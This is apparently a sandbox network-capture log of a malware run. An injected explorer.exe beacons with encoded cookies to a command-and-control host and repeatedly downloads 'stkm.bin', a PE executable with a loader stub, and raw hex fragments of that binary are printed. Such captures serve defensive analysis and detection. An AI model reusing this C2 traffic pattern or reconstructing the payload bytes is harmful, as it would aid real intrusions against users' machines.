2024-12-03 16:44:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49869	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:45:01 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hkdViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:45:03 UTC	789	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:45:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=59QqeCaJ7yzEFT%2BXqa2XjA9hTKrOnvpacX1Y%2Fwapvmc84%2FFkSycH1SMqhjf3dBjyT%2BAEydOCHxrOP9G%2FA9w%2BbP5mgh7JBvNNNmXqLQAdEbbnvYdKBuiU9NoVKLCbT4za"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec50656ecf80f6c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1558&min_rtt=1525&rtt_var=595&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1048&delivery_rate=1914754&cwnd=180&unsent_bytes=0&cid=a2f9779c11cdbf65&ts=1653&x=0"
2024-12-03 16:45:03 UTC	427	IN	Data Raw: 31 61 34 0d 0a 4d 79 36 61 52 4d 71 77 33 34 70 76 5a 52 33 64 67 57 62 6c 67 33 42 48 50 55 2f 55 42 69 50 43 61 66 71 36 75 53 37 49 59 6d 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 71 49 55 51 74 66 70 54 6f 37 46 59 6d 43 4c 65 33 73 71 52 47 73 5a 53 74 70 38 6f 33 36 30 35 64 48 32 52 4d 36 73 47 69 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 73 78 41 65 2f 6d 49 52 56 2b 61 62 44 48 63 33 51 6c 37 73 74 46 37 6c 50 62 43 48 5a 43 67 45 34 35 4d 56 77 4a 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 50 66 64 54 51 4a Data Ascii: 1a4My6aRMqw34pvZR3dgWblg3BHPU/UBiPCafq6uS7IYmmcphSGpB6yiJiVjA1qIUQtfpTo7FYmCLe3sqRGsZStp8o3605dH2RM6sGifW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KcsxAe/mIRV+abDHc3Ql7stF7lPbCHZCgE45MVwJcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZPfdTQJ
2024-12-03 16:45:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49878	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:45:05 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hldViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:45:07 UTC	783	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:45:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ziEZaMtAmwKqrW7G53Nopxw6w7y1nXvXgLlR%2Bu8MzmIzrEksiRExLUbjAXPpy05zI8IMh%2BMfmFZo2yQcV8fAagzNIPR4irzJcWPOwGMyucsfqy0rZfb01%2BhwM4SwD1WN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec5066e5a0432e2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1853&min_rtt=1837&rtt_var=722&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=1482986&cwnd=159&unsent_bytes=0&cid=109b0f9602647ae3&ts=1647&x=0"
2024-12-03 16:45:07 UTC	427	IN	Data Raw: 31 61 34 0d 0a 4d 79 6d 61 51 73 65 78 33 34 70 68 59 42 37 5a 67 57 58 6e 67 33 52 4c 4f 6b 7a 56 41 79 4c 43 5a 2f 2b 32 76 53 58 4b 59 32 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6f 4c 6b 63 75 66 70 66 6e 37 46 38 6b 43 62 57 33 74 61 4e 47 75 70 4b 71 6f 63 45 2b 37 55 35 53 48 47 52 50 37 4d 58 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 45 4d 73 30 41 75 33 6b 4a 48 4d 59 62 37 50 46 65 58 67 73 71 34 4a 4f 35 6c 72 66 44 6e 5a 44 69 30 6f 37 4e 56 77 42 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 4e 76 39 62 51 35 Data Ascii: 1a4MymaQsex34phYB7ZgWXng3RLOkzVAyLCZ/+2vSXKY2mcphSGpB6yiJiVjA1oLkcufpfn7F8kCbW3taNGupKqocE+7U5SHGRP7MXsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4EMs0Au3kJHMYb7PFeXgsq4JO5lrfDnZDi0o7NVwBcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZNv9bQ5
2024-12-03 16:45:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49886	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:45:10 UTC	126	OUT	GET /files/stkm.bin HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com
2024-12-03 16:45:10 UTC	945	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:45:10 GMT Content-Type: application/octet-stream Content-Length: 857600 Connection: close Content-Disposition: attachment; filename = stkm.bin Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 4266 Last-Modified: Tue, 03 Dec 2024 15:34:04 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=14L%2Fu8%2BlnCW0yRlADcPpELq%2B1wv9T7SMftgeEw0sB0I1BVJ5g74nE3sHXv0mlPQ5sRepvMQoLQs9YQvJsNILZuQzv%2Fb790jzzlHIf%2FP1PKio7OmxIvIBDM7CAH%2B7Q4%2Bu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec5068b9afa43c9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1677&min_rtt=1675&rtt_var=633&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=764&delivery_rate=1722713&cwnd=230&unsent_bytes=0&cid=a4d7cd64d871f008&ts=2193&x=0"
2024-12-03 16:45:10 UTC	424	IN	Data Raw: 4d 5a 45 52 e8 00 00 00 00 59 48 83 e9 09 48 8b c1 48 05 00 10 0d 00 ff d0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 96 98 3e 4d f7 f6 6d 4d f7 f6 6d 4d f7 f6 6d f9 6b 07 6d 4a f7 f6 6d f9 6b 05 6d d6 f7 f6 6d f9 6b 04 6d 42 f7 f6 6d e0 a9 f5 6c 4a f7 f6 6d e0 a9 f3 6c 51 f7 f6 6d e0 a9 f2 6c 5c f7 f6 6d 44 8f 75 6d 4c f7 f6 6d 44 8f 71 6d 4c f7 f6 6d 44 8f 65 6d 42 f7 f6 6d 4d f7 f7 6d ff f7 f6 6d f8 a9 fe 6c 5b f7 f6 6d f8 a9 09 6d 4c f7 f6 6d f8 a9 f4 6c 4c f7 f6 6d 52 69 63 68 4d f7 f6 Data Ascii: MZERYHHH!L!This program cannot be run in DOS mode.$>MmMmMmkmJmkmmkmBmlJmlQml\mDumLmDqmLmDemBmMmml[mmLmlLmRichM
2024-12-03 16:45:10 UTC	1369	IN	Data Raw: 00 70 0c 00 20 5b 00 00 00 00 00 00 00 00 00 00 00 f0 0c 00 70 10 00 00 d0 b8 0b 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 b9 0b 00 94 00 00 00 00 00 00 00 00 00 00 00 00 50 0a 00 68 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 30 0a 00 00 10 00 00 00 30 0a 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 62 73 73 00 00 00 00 00 00 10 00 00 00 40 0a 00 00 10 00 00 00 40 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 64 61 74 61 00 00 00 c0 01 00 00 50 0a 00 00 c0 01 00 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 60 00 00 00 10 0c 00 00 60 00 00 00 10 0c 00 00 00 00 00 00 00 00 Data Ascii: p [p8Ph.text00 `bss@@.rdataPP@@.data``
2024-12-03 16:45:10 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-12-03 16:45:10 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-12-03 16:45:10 UTC	1369	IN	Data Raw: 09 ff c2 66 39 4c 54 20 75 f7 48 8d 4c 24 20 e8 cd 13 00 00 eb 02 33 c0 48 81 c4 38 02 00 00 c3 cc 48 89 5c 24 08 48 89 7c 24 10 55 48 8d ac 24 60 fd ff ff 48 81 ec a0 03 00 00 48 8d 0d 7b 4a 0c 00 c7 44 24 20 eb 2f 76 e0 48 8d 05 ac 46 0c 00 48 89 4c 24 28 48 89 44 24 30 48 8d 05 53 46 0c 00 48 89 44 24 48 48 8d 05 4f 46 0c 00 48 89 44 24 60 48 8d 05 4b 46 0c 00 48 89 44 24 78 48 8d 05 d7 46 0c 00 48 89 45 90 48 8d 05 3c 46 0c 00 48 89 45 a8 48 8d 05 39 46 0c 00 48 89 45 c0 48 8d 05 36 46 0c 00 48 89 45 d8 48 8d 05 33 46 0c 00 48 89 45 f0 48 8d 05 30 46 0c 00 48 89 45 08 48 8d 05 2d 46 0c 00 48 89 45 20 48 8d 05 32 46 0c 00 48 89 45 38 48 8d 05 2f 46 0c 00 48 89 45 50 48 8d 05 2c 46 0c 00 48 89 45 68 48 8d 05 29 46 0c 00 48 89 85 80 00 00 00 48 8d 05 23 Data Ascii: f9LT uHL$ 3H8H\$H\|$UH$`HH{JD$ /vHFHL$(HD$0HSFHD$HHOFHD$`HKFHD$xHFHEH<FHEH9FHEH6FHEH3FHEH0FHEH-FHE H2FHE8H/FHEPH,FHEhH)FHH#

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49894	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:45:13 UTC	150	OUT	GET /files/stkm.bin HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Connection: Keep-Alive
2024-12-03 16:45:13 UTC	947	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:45:13 GMT Content-Type: application/octet-stream Content-Length: 857600 Connection: close Content-Disposition: attachment; filename = stkm.bin Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 4269 Last-Modified: Tue, 03 Dec 2024 15:34:04 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uj6oAaovnGPUQjumzivS8d94U%2F%2BtW99j%2ByCPv9vgcTlT3d7I84Lz1rEZ%2BG0fnl2zIiDBfsKWzucS%2FQ5o1fQKJ467y3Ef%2BASGEgWAsv6Eiv8I%2FkgiNncC%2BqqmNHY9vqMu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec5069e4cf00f3f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1538&min_rtt=1531&rtt_var=589&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=764&delivery_rate=1836477&cwnd=193&unsent_bytes=0&cid=53f68de8e113a7be&ts=1734&x=0"
2024-12-03 16:45:13 UTC	422	IN	Data Raw: 4d 5a 45 52 e8 00 00 00 00 59 48 83 e9 09 48 8b c1 48 05 00 10 0d 00 ff d0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 96 98 3e 4d f7 f6 6d 4d f7 f6 6d 4d f7 f6 6d f9 6b 07 6d 4a f7 f6 6d f9 6b 05 6d d6 f7 f6 6d f9 6b 04 6d 42 f7 f6 6d e0 a9 f5 6c 4a f7 f6 6d e0 a9 f3 6c 51 f7 f6 6d e0 a9 f2 6c 5c f7 f6 6d 44 8f 75 6d 4c f7 f6 6d 44 8f 71 6d 4c f7 f6 6d 44 8f 65 6d 42 f7 f6 6d 4d f7 f7 6d ff f7 f6 6d f8 a9 fe 6c 5b f7 f6 6d f8 a9 09 6d 4c f7 f6 6d f8 a9 f4 6c 4c f7 f6 6d 52 69 63 68 4d f7 f6 Data Ascii: MZERYHHH!L!This program cannot be run in DOS mode.$>MmMmMmkmJmkmmkmBmlJmlQml\mDumLmDqmLmDemBmMmml[mmLmlLmRichM
2024-12-03 16:45:13 UTC	1369	IN	Data Raw: 00 00 00 70 0c 00 20 5b 00 00 00 00 00 00 00 00 00 00 00 f0 0c 00 70 10 00 00 d0 b8 0b 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 b9 0b 00 94 00 00 00 00 00 00 00 00 00 00 00 00 50 0a 00 68 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 30 0a 00 00 10 00 00 00 30 0a 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 62 73 73 00 00 00 00 00 00 10 00 00 00 40 0a 00 00 10 00 00 00 40 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 64 61 74 61 00 00 00 c0 01 00 00 50 0a 00 00 c0 01 00 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 60 00 00 00 10 0c 00 00 60 00 00 00 10 0c 00 00 00 00 00 00 Data Ascii: p [p8Ph.text00 `bss@@.rdataPP@@.data``
2024-12-03 16:45:13 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49904	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:45:16 UTC	126	OUT	GET /files/stkm.bin HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com
2024-12-03 16:45:16 UTC	947	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:45:16 GMT Content-Type: application/octet-stream Content-Length: 857600 Connection: close Content-Disposition: attachment; filename = stkm.bin Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 4272 Last-Modified: Tue, 03 Dec 2024 15:34:04 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7b0%2F5w2%2F74gWb8LXvT1o6rzuiM8tLFtuEOpWT%2BG06CtQuvpWygk1eY7WhO01p%2FSy3SXpX7YlV5lNQmiDVLbk77LzdfZHkkYniW9kr%2FkXvo%2B%2Fli2n1MYd63ehRMeXf%2BpO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec506b15b3a0c78-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1566&min_rtt=1566&rtt_var=587&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=764&delivery_rate=1864623&cwnd=230&unsent_bytes=0&cid=97aa066eb3c50aca&ts=1800&x=0"
2024-12-03 16:45:16 UTC	422	IN	Data Raw: 4d 5a 45 52 e8 00 00 00 00 59 48 83 e9 09 48 8b c1 48 05 00 10 0d 00 ff d0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 96 98 3e 4d f7 f6 6d 4d f7 f6 6d 4d f7 f6 6d f9 6b 07 6d 4a f7 f6 6d f9 6b 05 6d d6 f7 f6 6d f9 6b 04 6d 42 f7 f6 6d e0 a9 f5 6c 4a f7 f6 6d e0 a9 f3 6c 51 f7 f6 6d e0 a9 f2 6c 5c f7 f6 6d 44 8f 75 6d 4c f7 f6 6d 44 8f 71 6d 4c f7 f6 6d 44 8f 65 6d 42 f7 f6 6d 4d f7 f7 6d ff f7 f6 6d f8 a9 fe 6c 5b f7 f6 6d f8 a9 09 6d 4c f7 f6 6d f8 a9 f4 6c 4c f7 f6 6d 52 69 63 68 4d f7 f6 Data Ascii: MZERYHHH!L!This program cannot be run in DOS mode.$>MmMmMmkmJmkmmkmBmlJmlQml\mDumLmDqmLmDemBmMmml[mmLmlLmRichM
2024-12-03 16:45:16 UTC	1369	IN	Data Raw: 00 00 00 70 0c 00 20 5b 00 00 00 00 00 00 00 00 00 00 00 f0 0c 00 70 10 00 00 d0 b8 0b 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 b9 0b 00 94 00 00 00 00 00 00 00 00 00 00 00 00 50 0a 00 68 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 30 0a 00 00 10 00 00 00 30 0a 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 62 73 73 00 00 00 00 00 00 10 00 00 00 40 0a 00 00 10 00 00 00 40 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 64 61 74 61 00 00 00 c0 01 00 00 50 0a 00 00 c0 01 00 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 60 00 00 00 10 0c 00 00 60 00 00 00 10 0c 00 00 00 00 00 00 Data Ascii: p [p8Ph.text00 `bss@@.rdataPP@@.data``
2024-12-03 16:45:16 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-12-03 16:45:16 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-12-03 16:45:16 UTC	1369	IN	Data Raw: 20 74 09 ff c2 66 39 4c 54 20 75 f7 48 8d 4c 24 20 e8 cd 13 00 00 eb 02 33 c0 48 81 c4 38 02 00 00 c3 cc 48 89 5c 24 08 48 89 7c 24 10 55 48 8d ac 24 60 fd ff ff 48 81 ec a0 03 00 00 48 8d 0d 7b 4a 0c 00 c7 44 24 20 eb 2f 76 e0 48 8d 05 ac 46 0c 00 48 89 4c 24 28 48 89 44 24 30 48 8d 05 53 46 0c 00 48 89 44 24 48 48 8d 05 4f 46 0c 00 48 89 44 24 60 48 8d 05 4b 46 0c 00 48 89 44 24 78 48 8d 05 d7 46 0c 00 48 89 45 90 48 8d 05 3c 46 0c 00 48 89 45 a8 48 8d 05 39 46 0c 00 48 89 45 c0 48 8d 05 36 46 0c 00 48 89 45 d8 48 8d 05 33 46 0c 00 48 89 45 f0 48 8d 05 30 46 0c 00 48 89 45 08 48 8d 05 2d 46 0c 00 48 89 45 20 48 8d 05 32 46 0c 00 48 89 45 38 48 8d 05 2f 46 0c 00 48 89 45 50 48 8d 05 2c 46 0c 00 48 89 45 68 48 8d 05 29 46 0c 00 48 89 85 80 00 00 00 48 8d Data Ascii: tf9LT uHL$ 3H8H\$H\|$UH$`HH{JD$ /vHFHL$(HD$0HSFHD$HHOFHD$`HKFHD$xHFHEH<FHEH9FHEH6FHEH3FHEH0FHEH-FHE H2FHE8H/FHEPH,FHEhH)FHH
2024-12-03 16:45:16 UTC	1369	IN	Data Raw: 41 57 48 8d a8 48 fe ff ff 48 81 ec 90 02 00 00 48 8d 05 5f 45 0c 00 c7 44 24 20 3b 64 d2 03 48 89 44 24 28 48 8d 74 24 28 48 8d 05 4e 45 0c 00 c7 44 24 30 7f 27 64 e7 45 33 e4 48 89 44 24 38 45 8b f4 4c 8d 2d f4 bf 0a 00 e8 23 fa ff ff e8 1e fa ff ff 48 89 85 c0 01 00 00 48 85 c0 0f 84 e5 00 00 00 41 8b fc ff c7 66 45 39 64 7d 00 75 f6 41 8b dc 66 44 39 20 74 09 ff c3 66 44 39 24 58 75 f7 8d 14 3b 8d 14 55 02 00 00 00 48 8d 8d c0 01 00 00 e8 1d 0d 00 00 85 c0 0f 84 a8 00 00 00 4c 8b bd c0 01 00 00 8b c3 49 8d 0c 47 03 ff 74 17 49 8b d5 44 8b c7 48 2b d1 8a 04 0a 88 01 48 ff c1 49 83 e8 01 75 f2 33 d2 48 8d 4c 24 40 41 b8 50 02 00 00 49 8b dc e8 c8 59 08 00 48 8d 54 24 40 49 8b cf ff 15 4a 44 0c 00 48 8b f8 48 83 f8 ff 74 4a eb 26 41 8b d4 66 